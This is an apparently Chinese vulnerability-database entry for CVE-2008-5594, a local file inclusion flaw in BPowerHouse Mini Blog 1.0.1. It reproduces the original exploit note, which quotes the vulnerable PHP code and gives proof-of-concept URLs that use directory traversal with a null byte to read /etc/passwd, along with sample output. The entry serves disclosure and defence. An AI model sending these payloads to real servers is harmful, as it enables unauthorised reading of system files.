BPowerHouse Mini Blog 'index.php' 多个目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116962 漏洞类型 路径遍历
发布时间 2008-12-07 更新时间 2008-12-18
CVE编号 CVE-2008-5594 CNNVD-ID CNNVD-200812-279
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7374
https://www.securityfocus.com/bid/32677
https://cxsecurity.com/issue/WLB-2008120138
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-279
|漏洞详情
MiniBlog是一款基于ASP和ACCESS实现的小型博客系统。MiniBlog1.0.1版本的index.php中存在多个目录遍历漏洞。远程攻击者可以借助(1)页和(2)管理参数中的一个..,包含和执行任意本地文件。
|漏洞EXP
/*

	$Id: miniblog-1.0.1-lfi.txt,v 0.1 2008/12/06 04:06:00 cOndemned Exp $
	
	Mini Blog 1.0.1 (index.php) Multiple Local File Inclusion Vulnerabilities
	Discovered by cOndemned

	Download : http://www.bpowerhouse.info/mini_blog.htm
	
	Greetz : ZaBeaTy, str0ke, d2, sid.psycho, Adish, TBH & Avantura ;*

*/

Source of index.php

	[...]

	7.	$page = !empty($_GET['page']) ? $_GET['page'] : "";
	8.	$admin = !empty($_GET['admin']) ? $_GET['admin'] : "";
	
	[...]
	
	77.	if (($page != "") && file_exists("page/" . $page . ".php")) {
	78.		require("page/" . $page . ".php");
	79.	} else if (($admin != "") && file_exists("admin/" . $admin . ".php")) {
	80.		require("admin/" . $admin . ".php");

	[...]
	

Proof of Concept

	http://[host]/[mini_blog_1.0.1_path]/index.php?page=../../../../[local_file]%00
	http://[host]/[mini_blog_1.0.1_path]/index.php?admin=../../../../[local_file]%00
	
	for example request :
	
	http://[host]/[mini_blog_1.0.1_path]/index.php?page=../../../../../etc/passwd%00
	
	...might give result like this :

	root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon...
	
	
EoF

# milw0rm.com [2008-12-07]
|受影响的产品
BPowerHouse Mini Blog 1.0.1
|参考资料

来源:XF
名称:miniblog-minicms-index-file-include(47149)
链接:http://xforce.iss.net/xforce/xfdb/47149
来源:BID
名称:32677
链接:http://www.securityfocus.com/bid/32677
来源:MILW0RM
名称:7374
链接:http://www.milw0rm.com/exploits/7374
来源:SREASON
名称:4744
链接:http://securityreason.com/securityalert/4744
来源:SECUNIA
名称:33024
链接:http://secunia.com/advisories/33024